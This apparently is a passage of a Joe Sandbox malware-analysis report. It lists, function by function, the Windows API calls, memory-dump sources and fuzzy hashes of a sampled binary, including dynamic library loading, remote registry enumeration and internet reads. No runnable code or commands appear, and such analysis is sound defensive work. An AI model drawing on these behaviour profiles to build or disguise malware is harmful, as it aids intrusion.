                                          • Instruction Fuzzy Hash: BFE08635B036339FD22117267C1CB6F6668EF81BA67151117FC00F6290DF60CD06C0A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E44E62
                                          • GetProcAddress.KERNEL32 ref: 00E44E74
                                          • FreeLibrary.KERNEL32 ref: 00E44E87
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 145871493-1355242751
                                          • Opcode ID: 685e76d49d0c0599f32aa529235d4e99c93b12f77d4b7a7161479d0591f630fd
                                          • Instruction ID: cf264d2b584d901d701e47c044a955c78ba24434dc9bca83246cba6c233affbc
                                          • Opcode Fuzzy Hash: 685e76d49d0c0599f32aa529235d4e99c93b12f77d4b7a7161479d0591f630fd
                                          • Instruction Fuzzy Hash: BED0C231A036335B8B221B267C08E8F6B2CEF81B953151613B800F7194CF20CD02C1D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcessId.KERNEL32 ref: 00ECA427
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00ECA435
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00ECA468
                                          • CloseHandle.KERNEL32(?), ref: 00ECA63D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                          • String ID:
                                          • API String ID: 3488606520-0
                                          • Opcode ID: 74dccc195e38275952283b3ab0844b3a31a4f490e99d76ddc150d3e02205b561
                                          • Instruction ID: e81242b043f1189b3a933e80154d22d4634f8b5ed72fe5fa2b9d69a330efe4b1
                                          • Opcode Fuzzy Hash: 74dccc195e38275952283b3ab0844b3a31a4f490e99d76ddc150d3e02205b561
                                          • Instruction Fuzzy Hash: 8DA1C1716043009FD720DF24D986F2AB7E1AF84718F18985DF95AAB392D771EC05CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EADDE0: GetFullPathNameW.KERNEL32 ref: 00EADDFD
                                            • Part of subcall function 00EADDE0: GetFullPathNameW.KERNEL32 ref: 00EADE16
                                            • Part of subcall function 00EAE199: GetFileAttributesW.KERNEL32 ref: 00EAE19A
                                          • lstrcmpiW.KERNEL32 ref: 00EAE473
                                          • MoveFileW.KERNEL32 ref: 00EAE4AC
                                          • _wcslen.LIBCMT ref: 00EAE5EB
                                          • _wcslen.LIBCMT ref: 00EAE603
                                          • SHFileOperationW.SHELL32 ref: 00EAE650
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                          • String ID:
                                          • API String ID: 3183298772-0
                                          • Opcode ID: 4fffc37df1ad8ea38d65ad114a0e2a98afd416b9b4214b492b98ae7630fc1d26
                                          • Instruction ID: c9b7f0c46393860761603c79110719b1bb92513c94719fdaa37aa6efa8532d7b
                                          • Opcode Fuzzy Hash: 4fffc37df1ad8ea38d65ad114a0e2a98afd416b9b4214b492b98ae7630fc1d26
                                          • Instruction Fuzzy Hash: C25193B24083459BC724DB94EC819DBB3ECAF99344F10191EF589E7192EF34B5888766
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                            • Part of subcall function 00ECC998: CharUpperBuffW.USER32(?,?), ref: 00ECC9B5
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECC9F1
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECCA68
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECCA9E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ECBAA5
                                          • RegOpenKeyExW.ADVAPI32 ref: 00ECBB00
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00ECBB63
                                          • RegCloseKey.ADVAPI32(?), ref: 00ECBBA6
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00ECBBB3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                          • String ID:
                                          • API String ID: 826366716-0
                                          • Opcode ID: ed70b07f19392b05eaaf879fc978ddf3c07f8d656895a689dab2052be7e3e45d
                                          • Instruction ID: f7a88e900281ebca27ea71c7c6157301807f4f352db61dad3aea93e297cadce8
                                          • Opcode Fuzzy Hash: ed70b07f19392b05eaaf879fc978ddf3c07f8d656895a689dab2052be7e3e45d
                                          • Instruction Fuzzy Hash: D461B131208241AFC314DF14C591F2ABBE5FF84308F14955DF499AB2A2CB32ED46CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00EA8BCD
                                          • VariantClear.OLEAUT32 ref: 00EA8C3E
                                          • VariantClear.OLEAUT32 ref: 00EA8C9D
                                          • VariantClear.OLEAUT32 ref: 00EA8D10
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EA8D3B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType
                                          • String ID:
                                          • API String ID: 4136290138-0
                                          • Opcode ID: b5d9c4d64393562bfe1e18aeb4b37633a2d4b5d9a6cd036990f6e7be2eaad840
                                          • Instruction ID: 13939e7ca9ba1c99436b7c5c30617b2c4f2268f0300e26e00f23936bae498ed8
                                          • Opcode Fuzzy Hash: b5d9c4d64393562bfe1e18aeb4b37633a2d4b5d9a6cd036990f6e7be2eaad840
                                          • Instruction Fuzzy Hash: 0A5169B5A0021AEFCB14CF68D894AAAB7F8FF8D314B158559E915EB350E730E911CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32 ref: 00EB8BAE
                                          • GetPrivateProfileSectionW.KERNEL32 ref: 00EB8BDA
                                          • WritePrivateProfileSectionW.KERNEL32 ref: 00EB8C32
                                          • WritePrivateProfileStringW.KERNEL32 ref: 00EB8C57
                                          • WritePrivateProfileStringW.KERNEL32 ref: 00EB8C5F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String
                                          • String ID:
                                          • API String ID: 2832842796-0
                                          • Opcode ID: 5536b9783a002d260d3779ff3c061ec333c1d7d182be9fbdbb817b5b7d4884b5
                                          • Instruction ID: 9b077bf75f593496199fbb27c5c5b8fe5cc4b25e052cb51899ce243178fe6e66
                                          • Opcode Fuzzy Hash: 5536b9783a002d260d3779ff3c061ec333c1d7d182be9fbdbb817b5b7d4884b5
                                          • Instruction Fuzzy Hash: F0516835A00215AFCB00DF64D881AAEBBF5FF48314F089459E849AB362CB35ED41CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00EC8F40
                                          • GetProcAddress.KERNEL32 ref: 00EC8FD0
                                          • GetProcAddress.KERNEL32 ref: 00EC8FEC
                                          • GetProcAddress.KERNEL32 ref: 00EC9032
                                          • FreeLibrary.KERNEL32 ref: 00EC9052
                                            • Part of subcall function 00E5F6C9: WideCharToMultiByte.KERNEL32 ref: 00E5F6E6
                                            • Part of subcall function 00E5F6C9: WideCharToMultiByte.KERNEL32 ref: 00E5F70D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                          • String ID:
                                          • API String ID: 666041331-0
                                          • Opcode ID: a9437bddb9d00975fa404fa061da138d040e1843e1dc5349fd015219b69662b7
                                          • Instruction ID: aa355bd4e8cb84cb994bc38e46ae54be88ef8ad67cdfa28c280b8574e26525e6
                                          • Opcode Fuzzy Hash: a9437bddb9d00975fa404fa061da138d040e1843e1dc5349fd015219b69662b7
                                          • Instruction Fuzzy Hash: 3C514934601245DFC715DF58C685DADBBF1FF49314B0490A9E80AAB362DB32ED86CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowLongW.USER32 ref: 00ED6C33
                                          • SetWindowLongW.USER32 ref: 00ED6C4A
                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00ED6C73
                                          • ShowWindow.USER32(00000002,00000000), ref: 00ED6C98
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00ED6CC7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Long$MessageSendShow
                                          • String ID:
                                          • API String ID: 3688381893-0
                                          • Opcode ID: cd24e5426c96d44d4a7f8b964efee2fc7fa0d45c1b4c2f3f8fb3eb07190b31d9
                                          • Instruction ID: 799f39137f5f52045aecca97fab1c80b62ce69a3fc543ed0ffc5c003a9d17f9f
                                          • Opcode Fuzzy Hash: cd24e5426c96d44d4a7f8b964efee2fc7fa0d45c1b4c2f3f8fb3eb07190b31d9
                                          • Instruction Fuzzy Hash: 5E41F235A10104AFDB24CF28CD58FE9BBA5EB09364F15122AF999B73E0C371ED42DA40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 2db33fa9bec31540ad548eb82763a8de03f9ed8bae05e3d9029bd1af582c1855
                                          • Instruction ID: cd7e69a10f852b5aab075beab2ad2d339550c3e0b27d0774d95a3b93812abff3
                                          • Opcode Fuzzy Hash: 2db33fa9bec31540ad548eb82763a8de03f9ed8bae05e3d9029bd1af582c1855
                                          • Instruction Fuzzy Hash: 2141D032A002049FCB24DF78C881A5AB3E5EF89714F1595ACEA19FB391DA31AD01CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 76d069d338b80cf55d25338acacce8cfde2718ba0fec15de47143e74676e0f7a
                                          • Instruction ID: baf4d275da3b464599714efb5dfd114e718788abab21433b877a6f279035e678
                                          • Opcode Fuzzy Hash: 76d069d338b80cf55d25338acacce8cfde2718ba0fec15de47143e74676e0f7a
                                          • Instruction Fuzzy Hash: 6C41AE31A0961AEBCF059F65C844BEEB7B4FB05324F20961AE865B3291C7306D58CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetInputState.USER32 ref: 00EB38CB
                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00EB3922
                                          • TranslateMessage.USER32(?), ref: 00EB394B
                                          • DispatchMessageW.USER32(?), ref: 00EB3955
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB3966
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                          • String ID:
                                          • API String ID: 2256411358-0
                                          • Opcode ID: dc01d18e4c4d446e3876b5eb96921b573e6120377a83fe4a74e6a56e34579d24
                                          • Instruction ID: c6728e7153dd4feb5041d68c68f5db282ea6e8817dee8268f75e6e9e142d2f22
                                          • Opcode Fuzzy Hash: dc01d18e4c4d446e3876b5eb96921b573e6120377a83fe4a74e6a56e34579d24
                                          • Instruction Fuzzy Hash: 1131F770504346AEEB35CB35AC4ABF737A8EB45308F14556EE562F20E4E7B0A684DB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00EBCF38
                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00EBCF6F
                                          • GetLastError.KERNEL32 ref: 00EBCFB4
                                          • SetEvent.KERNEL32 ref: 00EBCFC8
                                          • SetEvent.KERNEL32 ref: 00EBCFF2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                          • String ID:
                                          • API String ID: 3191363074-0
                                          • Opcode ID: 2059aa5d18ae9d6ab5787b9506b36c4a3e77ffec667021bf03a589cfc5225171
                                          • Instruction ID: ebd7083ffc46257bbc1cc54fab4837c6c59a6fdefd3c0d55717972259e33a59b
                                          • Opcode Fuzzy Hash: 2059aa5d18ae9d6ab5787b9506b36c4a3e77ffec667021bf03a589cfc5225171
                                          • Instruction Fuzzy Hash: AC317F71608206AFDB20DFA5D884AFBBBF9EB04355B20546EF506F2110DB30ED44DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00ED5745
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00ED579D
                                          • _wcslen.LIBCMT ref: 00ED57AF
                                          • _wcslen.LIBCMT ref: 00ED57BA
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00ED5816
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$_wcslen
                                          • String ID:
                                          • API String ID: 763830540-0
                                          • Opcode ID: 7853552fc24abcfea64eb0c5ac2e4d8574659fcff593a9d0fdde61b70bbf8ef4
                                          • Instruction ID: 28abeefc88f35858909d67efaf2f1050308fd46c2695c9a7c6265eae038dc50d
                                          • Opcode Fuzzy Hash: 7853552fc24abcfea64eb0c5ac2e4d8574659fcff593a9d0fdde61b70bbf8ef4
                                          • Instruction Fuzzy Hash: 4A218272904618DADB209FA4DC85AEE77B8FF44764F109217F929FA2C0D7708986CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsWindow.USER32(00000000), ref: 00EC0951
                                          • GetForegroundWindow.USER32 ref: 00EC0968
                                          • GetDC.USER32(00000000), ref: 00EC09A4
                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00EC09B0
                                          • ReleaseDC.USER32(00000000,00000003), ref: 00EC09E8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$ForegroundPixelRelease
                                          • String ID:
                                          • API String ID: 4156661090-0
                                          • Opcode ID: 3d5ec06e6be6a2ec547238e01b0d41292d55be7854571635f366bf40965ef50d
                                          • Instruction ID: 850208b914a90bea2fc945abd24a45b807ec483a6b797e2048a9e1ebefe1b1ad
                                          • Opcode Fuzzy Hash: 3d5ec06e6be6a2ec547238e01b0d41292d55be7854571635f366bf40965ef50d
                                          • Instruction Fuzzy Hash: D5216F35600214AFD704EF65D984AAFBBF9EF84740F14806DE85AA7752CB34EC05CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 00E7CDC6
                                          • WideCharToMultiByte.KERNEL32 ref: 00E7CDE9
                                            • Part of subcall function 00E73820: RtlAllocateHeap.NTDLL(00000000,?,00F11444,?,00E5FDF5,?,?,00E4A976,00000010,00F11440,00E413FC,?,00E413C6,?,00E41129), ref: 00E73852
                                          • WideCharToMultiByte.KERNEL32 ref: 00E7CE0F
                                          • _free.LIBCMT ref: 00E7CE22
                                          • FreeEnvironmentStringsW.KERNEL32 ref: 00E7CE31
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: c58959ed0bd31555cc24c1f37f192f614d9c16f963797cbd41cebdafb5746c4c
                                          • Instruction ID: 2bc6deab2bb7af8136acedee3283433536b9666fe269d0baed958d564dc1eb13
                                          • Opcode Fuzzy Hash: c58959ed0bd31555cc24c1f37f192f614d9c16f963797cbd41cebdafb5746c4c
                                          • Instruction Fuzzy Hash: B701D8726026157F272116B76C48C7F6B6DDFC6BA5335912EFA0DF7100DA608D0281B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: 02d8046ec9496c37e41cfc7a31732ca4a9a44cd749eac77ec1b447dd00859b99
                                          • Instruction ID: 96edd93b0ff5e1762962b1063070f3ed5d6b03a05127e4a10152ee35680e4a56
                                          • Opcode Fuzzy Hash: 02d8046ec9496c37e41cfc7a31732ca4a9a44cd749eac77ec1b447dd00859b99
                                          • Instruction Fuzzy Hash: CD217F7080230AEFDB119F25EC157E97BB9FB0039AF518616F920B61A1D3B4589DEF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 4623e1739c9d2d9416b92bf413b6ed4ce56eae1b2a4949f867b583ac571056a9
                                          • Instruction ID: 7cd66e6c8aa6c6658acfb82ecf304b474b2c4f2f2ee5da72dfcea1b05c795d9e
                                          • Opcode Fuzzy Hash: 4623e1739c9d2d9416b92bf413b6ed4ce56eae1b2a4949f867b583ac571056a9
                                          • Instruction Fuzzy Hash: 5E019663681B15FAD21896109D42EFA639CDB263A8B046423FD16BE741F760FD2182A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
